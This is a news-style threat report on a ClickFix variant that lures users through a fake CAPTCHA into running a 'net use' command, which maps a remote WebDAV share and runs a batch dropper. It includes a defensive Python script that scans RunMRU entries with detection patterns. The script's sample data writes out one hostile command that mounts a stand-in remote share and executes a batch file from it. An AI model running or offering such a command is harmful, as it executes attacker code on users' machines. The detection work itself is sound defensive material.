The cybersecurity landscape has witnessed the emergence of a new variant of the ClickFix technique, which exploits network drives to execute malicious commands on users' devices. Researchers at Atos have uncovered this variant, which deviates from traditional methods by using the 'net use' command to establish a connection with an external server and then executing a batch file from it. This approach allows attackers to bypass detection mechanisms and compromise systems.
Mechanics of the New ClickFix Variant
This new variant begins with a familiar tactic, where users are tricked into executing commands via the Win+R shortcut. Once activated, a URL is accessed that maps a network drive from an external server, and a batch script is executed from this drive. This script downloads a ZIP archive, then extracts and runs the WorkFlowy application with malicious modifications embedded within an '.asar' archive. The modified application acts as both a C2 beacon and a malware dropper.
The initial phase involves a phishing web page that mimics a CAPTCHA, prompting users to initiate the Run application using specific key commands. The subsequent command executed includes a sequence that maps a network drive and triggers a script, marking a departure from previous ClickFix attacks that relied on PowerShell or mshta for further execution. This method allows adversaries to remain undetected by standard security measures.
Bypassing Detection and Evading Defenses
The use of network drives in this ClickFix variant is particularly noteworthy due to its ability to avoid traditional detection strategies. By leveraging the ‘net use’ command, attackers can mount a remote WebDAV share as a local drive, execute a batch script, and promptly remove the mapping, leaving minimal traces. This approach contrasts with prior tactics that often left digital footprints that were easier for security tools to detect.
Atos’s internal Threat Hunting service was instrumental in identifying this threat, as traditional security controls like Microsoft Defender for Endpoint failed to detect it. The focus on the behavioral aspect of the ClickFix technique, particularly execution via the RunMRU registry key, proved crucial in uncovering this sophisticated attack.
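The RunMRU-based hunting credited above can be approximated offline by inspecting the Run dialog history for the mapping-script-unmapping pattern the article describes. The following is an added example, not code from Atos or the original report; it assumes the RunMRU values have been exported into a dict (the sample entries are constructed) and the indicator patterns are this editor's reading of the described behaviour.

```python
"""Flag Explorer RunMRU entries showing the net-use-and-batch pattern above."""
import re

# Standard location of the Run dialog history; each value is the typed
# command with a trailing "\1" marker appended by Explorer.
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# One regex per behaviour the article describes: mapping a remote share with
# net use, WebDAV host@port syntax, a .bat/.cmd run from a drive letter, and
# the mapping being removed again in the same command line.
INDICATORS = {
    "net_use_remote_share": re.compile(r"\bnet\s+use\b[^&|]*\\\\[^\s\\]+", re.I),
    "webdav_port_syntax": re.compile(r"\\\\[^\s\\]+@(?:ssl@)?\d+", re.I),
    "script_from_mapped_drive": re.compile(r"\b[a-z]:\\[^&|\s]*\.(?:bat|cmd)\b", re.I),
    "mapping_removed": re.compile(r"\bnet\s+use\b[^&|]*/delete", re.I),
}

def strip_mru_marker(value: str) -> str:
    """Drop the trailing '\\1' Explorer appends to every RunMRU value."""
    return value[:-2] if value.endswith("\\1") else value

def score_command(cmd: str) -> list[str]:
    """Return the indicator names present in one Run-dialog command."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def flag_runmru(values: dict[str, str], min_hits: int = 2) -> dict[str, list[str]]:
    """Return {value_name: indicators} for entries with at least min_hits.

    `values` mirrors the key's name -> data pairs as a registry export or
    winreg.EnumValue would give them; MRUList only stores ordering.
    """
    flagged = {}
    for name, data in values.items():
        if name == "MRUList":
            continue
        hits = score_command(strip_mru_marker(data))
        if len(hits) >= min_hits:
            flagged[name] = hits
    return flagged

# Constructed sample entries; the host is an RFC 5737 documentation address.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\public\\1",
    "c": "cmd /c net use Z: \\\\203.0.113.10@80\\share & Z:\\run.bat & net use Z: /delete\\1",
}

if __name__ == "__main__":
    for name, hits in flag_runmru(SAMPLE_RUNMRU).items():
        print(f"{RUNMRU_KEY}\\{name}: {', '.join(hits)}")
```

Requiring two or more indicators keeps an ordinary `net use` to an internal file server from being flagged on its own.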
Implications for Cybersecurity and Future Outlook
This evolution of the ClickFix technique signifies a broader trend in cybersecurity threats, where attackers are increasingly using native tools and trusted applications to carry out malicious activities. The integration of the malicious code within the Electron application, specifically the WorkFlowy app, demonstrates how attackers can exploit legitimate software to evade detection. This development underscores the need for enhanced threat hunting capabilities and more comprehensive defense strategies.
As this ClickFix variant continues to challenge conventional security measures, organizations must adapt by focusing on proactive threat detection and understanding the evolving tactics employed by adversaries. This highlights the importance of continuous monitoring and analysis of execution contexts rather than relying solely on payload indicators.
